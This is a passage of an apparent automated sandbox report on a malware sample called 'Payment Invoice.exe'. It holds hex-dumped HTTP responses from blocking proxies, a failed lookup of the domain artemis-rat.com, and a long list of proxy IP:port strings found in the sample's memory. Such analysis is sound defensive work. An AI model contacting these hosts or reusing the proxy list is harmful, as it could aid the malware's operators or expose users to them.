height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundatio
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:21 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 15:15:21 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:22 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:22 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:22 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 15:15:24 GMTContent-Length: 102Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 33 32 38 35 32 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:32852->1.1.1.1:53: i/o timeout
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:24 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:25 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:33 GMTContent-Type: text/html;charset=utf-8Content-Length: 3699X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from hostX-Cache-Lookup: NONE from host:3128Connection: closeData Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e d0 9e d0 a8 d0 98 d0 91 d0 9a d0 90 3a 20 d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d1 8b d0 b9 20 55 52 4c 20 d0 bd d0 b5 20 d0 bc d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 20 d0 Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:35 GMTContent-Type: text/html;charset=utf-8Content-Length: 3776X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundatio
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.0.0.0
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.0.0.0:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.0.4:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.171.213:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.171.213:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.205.87:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.0.205.87:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.15.62.12:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.15.62.12:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.179.147.5:52210
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.179.147.5:52210://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.179.148.9:55636
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.179.148.9:55636://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.194.236.229:5005
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.194.236.229:5005://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.2.209.194:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.2.209.194:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.200.154:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://1.20.200.154:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.109.251
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.109.251.42:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.109.251.42:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.116.125:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.116.125:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://101.255.140.1:8090
